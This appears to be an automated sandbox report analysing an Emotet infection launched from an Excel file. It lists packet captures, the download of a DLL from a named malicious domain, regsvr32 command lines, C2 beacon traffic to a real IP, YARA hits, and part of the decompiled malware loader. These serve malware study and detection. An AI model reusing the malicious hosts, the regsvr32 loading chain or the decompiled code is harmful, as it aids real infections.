                                                                                                              Mar 2, 2022 16:42:20.553123951 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553157091 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553158045 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553181887 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553214073 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553245068 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553273916 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553317070 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553327084 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553337097 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553368092 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553378105 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553388119 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553416014 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553420067 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553427935 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553459883 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553466082 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553495884 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553499937 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553541899 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553549051 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553584099 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553589106 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553625107 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553632021 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553664923 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553678036 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553703070 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553704977 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553714991 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553745031 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553752899 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553783894 CET8049165212.64.200.154192.168.2.22
                                                                                                              Mar 2, 2022 16:42:20.553793907 CET4916580192.168.2.22212.64.200.154
                                                                                                              Mar 2, 2022 16:42:20.553827047 CET8049165212.64.200.154192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 2, 2022 16:42:19.816369057 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Mar 2, 2022 16:42:19.832957029 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mar 2, 2022 16:42:19.816369057 CET | 192.168.2.22 | 8.8.8.8 | 0x6808 | Standard query (0) | gymsportive.com | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mar 2, 2022 16:42:19.832957029 CET | 8.8.8.8 | 192.168.2.22 | 0x6808 | No error (0) | gymsportive.com | | 212.64.200.154 | A (IP address) | IN (0x0001)
                                                                                                              • 168.119.39.118
                                                                                                              • gymsportive.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49166 | 168.119.39.118 | 443 | C:\Windows\SysWOW64\regsvr32.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49165 | 212.64.200.154 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Mar 2, 2022 16:42:19.905479908 CET | 2 | OUT | GET /0zwe/pSiUh/ HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              UA-CPU: AMD64
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                              Host: gymsportive.com
                                                                                                              Connection: Keep-Alive
Mar 2, 2022 16:42:19.981950045 CET | 3 | IN | HTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/x-msdownload
                                                                                                              Expires: Wed, 02 Mar 2022 15:42:19 GMT
                                                                                                              Last-Modified: Wed, 02 Mar 2022 15:42:19 GMT
                                                                                                              Server:
                                                                                                              Set-Cookie: 621f905be66af=1646235739; expires=Wed, 02-Mar-2022 15:43:19 GMT; Max-Age=60; path=/
                                                                                                              Content-Disposition: attachment; filename="Lg1r0mo1.dll"
                                                                                                              Content-Transfer-Encoding: binary
                                                                                                              X-Powered-By-Plesk: PleskWin
                                                                                                              Date: Wed, 02 Mar 2022 15:43:42 GMT
                                                                                                              Content-Length: 1028096


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.2249166168.119.39.118443C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2022-03-02 15:43:15 UTC | 0 | OUT | GET /RTqOvyibSpsqRLeCHAwzwsZUvkaT HTTP/1.1
                                                                                                              Cookie: qNjwxkh=AFLTfK9fIBK6lnbulhI7c8xuJYBHytmEF4RnscbegU5ARco2Ov+wvYmlCWGjR5iRbpiDElFN0mE7/RzA1kBHXra1n+DdZZ/0nWkhpfgcHvYmOKaBSaM2AlKPdCLcHXfASzT21JxpI+itOUwulg0p/YvVS81C8mnpxG+6TaYEIXQNyx0QR8otuNcfuEKU4QpHu9EKg/ECc3gGVpKbTk7/I2FJs30AWb2pLbxGdfiqBgsF51+Oaaj/uTpMmG1137PAZBtRtn3mSRV+k/bNw0I3O4V3sJnZYPMRB6W35SRjpQR4FfjE4A==
                                                                                                              Host: 168.119.39.118
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
2022-03-02 15:43:16 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                                              Server: nginx
                                                                                                              Date: Wed, 02 Mar 2022 15:43:16 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close


                                                                                                              Target ID:0
                                                                                                              Start time:16:41:19
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                              Imagebase:0x13fb30000
                                                                                                              File size:28253536 bytes
                                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Target ID:3
                                                                                                              Start time:16:41:29
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.438925109.0000000000461000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.438768483.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:4
                                                                                                              Start time:16:41:32
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.449507584.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:5
                                                                                                              Start time:16:41:37
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.456044054.00000000005D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:6
                                                                                                              Start time:16:41:40
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.462842300.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:7
                                                                                                              Start time:16:41:44
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.468918489.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.469106015.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:8
                                                                                                              Start time:16:41:46
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.474514223.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:9
                                                                                                              Start time:16:41:49
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.483801415.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:10
                                                                                                              Start time:16:41:54
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.490790525.0000000000951000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.490748655.0000000000920000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:11
                                                                                                              Start time:16:41:56
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.497540117.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.497591181.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Target ID:12
                                                                                                              Start time:16:42:00
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.504764395.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.504642074.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                              Target ID:13
                                                                                                              Start time:16:42:03
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.510846343.0000000000231000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.510821568.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                              Target ID:14
                                                                                                              Start time:16:42:06
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.522451287.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.522428757.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                              Target ID:15
                                                                                                              Start time:16:42:12
                                                                                                              Start date:02/03/2022
                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc"
                                                                                                              Imagebase:0xb70000
                                                                                                              File size:14848 bytes
                                                                                                              MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.714099978.0000000000501000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.713962264.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security


                                                                                                                Execution Graph

                                                                                                                Execution Coverage:0.8%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:17.6%
                                                                                                                Total number of Nodes:279
                                                                                                                Total number of Limit Nodes:18

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10007DD4(void* __ebx, void* __edi, void* __esi, struct HINSTANCE__* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				short _v10;
                                                                                                                				short _v12;
                                                                                                                				short _v14;
                                                                                                                				short _v16;
                                                                                                                				short _v18;
                                                                                                                				short _v20;
                                                                                                                				short _v22;
                                                                                                                				short _v24;
                                                                                                                				short _v26;
                                                                                                                				char _v28;
                                                                                                                				short _v32;
                                                                                                                				short _v34;
                                                                                                                				short _v36;
                                                                                                                				short _v38;
                                                                                                                				short _v40;
                                                                                                                				short _v42;
                                                                                                                				short _v44;
                                                                                                                				short _v46;
                                                                                                                				short _v48;
                                                                                                                				short _v50;
                                                                                                                				char _v52;
                                                                                                                				short _v56;
                                                                                                                				short _v58;
                                                                                                                				short _v60;
                                                                                                                				short _v62;
                                                                                                                				short _v64;
                                                                                                                				short _v66;
                                                                                                                				short _v68;
                                                                                                                				short _v70;
                                                                                                                				short _v72;
                                                                                                                				short _v74;
                                                                                                                				short _v76;
                                                                                                                				short _v78;
                                                                                                                				short _v80;
                                                                                                                				signed int _v84;
                                                                                                                				void* _v88;
                                                                                                                				int _v92;
                                                                                                                				struct HINSTANCE__* _v96;
                                                                                                                				void* _v100;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t80;
                                                                                                                				void* _t86;
                                                                                                                				short _t90;
                                                                                                                				intOrPtr _t97;
                                                                                                                				intOrPtr _t98;
                                                                                                                				intOrPtr _t99;
                                                                                                                				intOrPtr _t100;
                                                                                                                				intOrPtr _t102;
                                                                                                                				intOrPtr _t103;
                                                                                                                				intOrPtr _t104;
                                                                                                                				intOrPtr _t105;
                                                                                                                				intOrPtr _t106;
                                                                                                                				intOrPtr _t107;
                                                                                                                				intOrPtr _t108;
                                                                                                                				intOrPtr _t109;
                                                                                                                				intOrPtr _t110;
                                                                                                                				intOrPtr _t111;
                                                                                                                				intOrPtr _t112;
                                                                                                                				intOrPtr _t113;
                                                                                                                				intOrPtr _t114;
                                                                                                                				intOrPtr _t115;
                                                                                                                				intOrPtr _t116;
                                                                                                                				intOrPtr _t118;
                                                                                                                				intOrPtr _t119;
                                                                                                                				long _t122;
                                                                                                                				signed int _t123;
                                                                                                                				void* _t124;
                                                                                                                				void* _t126;
                                                                                                                				signed int _t127;
                                                                                                                				intOrPtr _t138;
                                                                                                                				signed int _t140;
                                                                                                                				void* _t157;
                                                                                                                				intOrPtr* _t158;
                                                                                                                				signed int _t179;
                                                                                                                				signed int _t183;
                                                                                                                				short _t198;
                                                                                                                				signed int _t201;
                                                                                                                				signed int _t204;
                                                                                                                				signed int _t205;
                                                                                                                				signed int _t206;
                                                                                                                				signed int _t207;
                                                                                                                				signed int _t208;
                                                                                                                				signed int _t209;
                                                                                                                				signed int _t210;
                                                                                                                				signed int _t212;
                                                                                                                				signed int _t214;
                                                                                                                				void* _t220;
                                                                                                                				signed int _t223;
                                                                                                                				void* _t240;
                                                                                                                				struct HRSRC__* _t241;
                                                                                                                				signed int _t242;
                                                                                                                				signed int _t244;
                                                                                                                				signed int _t245;
                                                                                                                				signed int _t256;
                                                                                                                				signed int _t258;
                                                                                                                				signed int _t259;
                                                                                                                				signed int _t274;
                                                                                                                				void* _t282;
                                                                                                                
                                                                                                                				_t239 = __esi;
                                                                                                                				_t219 = __edi;
                                                                                                                				_t156 = __ebx;
                                                                                                                				_t80 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t80 ^ _t274;
                                                                                                                				_v96 = _a4;
                                                                                                                				_t84 = _a8 != 1;
                                                                                                                				_t280 = _a8 != 1;
                                                                                                                				if(_a8 != 1) {
                                                                                                                					L6:
                                                                                                                					_t86 = 1;
                                                                                                                				} else {
                                                                                                                					if(L10001361(_t84, __ebx, __esi, _t280) != 0) {
                                                                                                                						_push(0x10098b28);
                                                                                                                						E10048578(__ebx, _t208, __edi, __esi, __eflags);
                                                                                                                						_t86 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					} else {
                                                                                                                						_t90 = 0x6c;
                                                                                                                						_t220 = 0;
                                                                                                                						_t198 = 0x64;
                                                                                                                						_v70 = _t90;
                                                                                                                						_v60 = _t90;
                                                                                                                						_v58 = _t90;
                                                                                                                						_v22 = _t90;
                                                                                                                						_v20 = _t90;
                                                                                                                						_v14 = _t90;
                                                                                                                						_v12 = _t90;
                                                                                                                						_v36 = _t90;
                                                                                                                						_v34 = _t90;
                                                                                                                						 *0x100b8250 = 0;
                                                                                                                						 *0x100b8254 = 0;
                                                                                                                						 *0x100b8258 = 0;
                                                                                                                						 *0x100b8260 = 0;
                                                                                                                						 *0x100b825c = 0;
                                                                                                                						 *0x100b8264 = 0;
                                                                                                                						 *0x100b8268 = 0;
                                                                                                                						_v80 = 0x6b;
                                                                                                                						_v78 = 0x65;
                                                                                                                						_v76 = 0x72;
                                                                                                                						_v74 = 0x6e;
                                                                                                                						_v72 = 0x65;
                                                                                                                						_v68 = 0x33;
                                                                                                                						_v66 = 0x32;
                                                                                                                						_v64 = 0x2e;
                                                                                                                						_v62 = _t198;
                                                                                                                						_v56 = 0;
                                                                                                                						_v28 = 0x6e;
                                                                                                                						_v26 = 0x74;
                                                                                                                						_v24 = _t198;
                                                                                                                						_v18 = 0x2e;
                                                                                                                						_v16 = _t198;
                                                                                                                						_v10 = 0;
                                                                                                                						_v52 = 0x6d;
                                                                                                                						_v50 = 0x73;
                                                                                                                						_v48 = 0x76;
                                                                                                                						_v46 = 0x63;
                                                                                                                						_v44 = 0x72;
                                                                                                                						_v42 = 0x74;
                                                                                                                						_v40 = 0x2e;
                                                                                                                						_v38 = _t198;
                                                                                                                						_v32 = 0;
                                                                                                                						_t240 = L10001497();
                                                                                                                						_v84 = L10001497();
                                                                                                                						_t42 =  &_v52; // 0x6d
                                                                                                                						_t157 = L10001497();
                                                                                                                						_t97 = L100013ED();
                                                                                                                						 *0x100bc0a4 = _t97;
                                                                                                                						_t98 = L100013ED();
                                                                                                                						 *0x100bc0a0 = _t98;
                                                                                                                						_t99 = L100013ED();
                                                                                                                						 *0x100bc094 = _t99;
                                                                                                                						_t100 = L100013ED();
                                                                                                                						 *0x100bc084 = _t100;
                                                                                                                						 *0x100bc098 = L100013ED();
                                                                                                                						_t102 = L100013ED();
                                                                                                                						 *0x100bc0b0 = _t102;
                                                                                                                						_t103 = L100013ED();
                                                                                                                						 *0x100bc05c = _t103;
                                                                                                                						_t104 = L100013ED();
                                                                                                                						 *0x100bc060 = _t104;
                                                                                                                						_t105 = L100013ED();
                                                                                                                						 *0x100bc06c = _t105;
                                                                                                                						_t106 = L100013ED();
                                                                                                                						 *0x100bc088 = _t106;
                                                                                                                						_t107 = L100013ED();
                                                                                                                						 *0x100bc080 = _t107;
                                                                                                                						_t108 = L100013ED();
                                                                                                                						 *0x100bc07c = _t108;
                                                                                                                						_t109 = L100013ED();
                                                                                                                						 *0x100bc08c = _t109;
                                                                                                                						_t110 = L100013ED();
                                                                                                                						 *0x100bc0b4 = _t110;
                                                                                                                						_t111 = L100013ED();
                                                                                                                						 *0x100bc070 = _t111;
                                                                                                                						_t112 = L100013ED();
                                                                                                                						 *0x100bc068 = _t112;
                                                                                                                						_t113 = L100013ED();
                                                                                                                						 *0x100bc0ac = _t113;
                                                                                                                						_t114 = L100013ED();
                                                                                                                						 *0x100bc0a8 = _t114;
                                                                                                                						_t115 = L100013ED();
                                                                                                                						 *0x100bc090 = _t115;
                                                                                                                						_t116 = L100013ED();
                                                                                                                						 *0x100bc064 = _t116;
                                                                                                                						_t158 = L100013ED();
                                                                                                                						 *0x100bc09c = _t158;
                                                                                                                						_t118 = L100013ED();
                                                                                                                						 *0x100bc078 = _t118;
                                                                                                                						_t119 = L100013ED();
                                                                                                                						 *0x100bc074 = _t119;
